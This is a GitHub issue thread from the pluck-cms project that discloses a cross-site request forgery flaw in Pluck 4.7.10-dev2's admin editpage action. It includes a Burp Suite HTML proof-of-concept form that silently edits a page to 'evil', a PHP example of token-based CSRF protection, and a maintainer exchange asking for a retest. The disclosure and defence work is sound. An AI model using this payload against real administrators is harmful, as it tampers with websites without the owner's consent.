pluck-cms / pluck

Central repo for pluck cms
http://www.pluck-cms.org

An issue was discovered in Pluck 4.7.10-dev2. There is a CSRF vulnerability that can editpage via a /admin.php?action=editpage #81

Closed F1sh1001 closed 4 years ago

F1sh1001 commented 4 years ago

CSRF POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/pluck/admin.php?action=editpage&page=111" method="POST">
      <input type="hidden" name="title" value="evil" />
      <input type="hidden" name="seo&#95;name" value="111" />
      <input type="hidden" name="content" value="evil" />
      <input type="hidden" name="description" value="" />
      <input type="hidden" name="keywords" value="" />
      <input type="hidden" name="hidden" value="no" />
      <input type="hidden" name="sub&#95;page" value="" />
      <input type="hidden" name="theme" value="oldstyle" />
      <input type="hidden" name="save" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

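As an added example (not Pluck's own code; the function names and the handler wiring are assumptions), a per-session anti-CSRF token that would reject the PoC form above, since a cross-site page cannot read the victim's session token and therefore cannot supply a matching value:

```php
<?php
// Added example, not Pluck's code. csrf_token() / csrf_verify() are
// hypothetical helper names; the handler wiring is a sketch.

session_start();

// Issue one random token per session and render it in every
// state-changing form (editpage, deletepage, settings, ...).
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token against the session
// token. The PoC form has no csrf_token field, so this returns false.
function csrf_verify(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Guard for admin.php?action=editpage: verify before any write happens.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['save'])) {
    if (!csrf_verify($_POST)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token; page not saved.');
    }
    // ... existing editpage save logic runs only past this point ...
}
?>
<form action="admin.php?action=editpage&amp;page=<?= rawurlencode($_GET['page'] ?? '') ?>" method="POST">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="text" name="title">
  <textarea name="content"></textarea>
  <input type="submit" name="save" value="Save">
</form>
```

Marking the session cookie SameSite=Lax or Strict adds defence in depth, because the browser then omits it from a cross-site top-level POST like the PoC's.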

BSteelooper commented 4 years ago

Where did you insert the script? It is JavaScript, so it only resides in the client. The /h1 will not appear in the file on disk.

Please explain more.

F1sh1001 commented 4 years ago

After the administrator opens the CSRF exploit page, a new page called evil will be added to your website.

BSteelooper commented 4 years ago

Could you please test the latest dev release 4.7.10-dev4? https://github.com/pluck-cms/pluck/releases/tag/4.7.10-dev4

BSteelooper commented 4 years ago

Have you retested with the latest dev version?

F1sh1001 commented 4 years ago

Sorry, I don't have much time. I'll try if I have time.

------------------ Original message ------------------ From: "Bas Steelooper"<notifications@github.com>; Sent: Tuesday, 22 October 2019, 15:19 To: "pluck-cms/pluck"<pluck@noreply.github.com>; Cc: "1113402387"<1113402387@qq.com>; "Author"<author@noreply.github.com>; Subject: Re: [pluck-cms/pluck] An issue was discovered in Pluck 4.7.10-dev2. There is a CSRF vulnerability that can editpage via a /admin.php?action=editpage (#81)

Have you retested with the latest dev version?
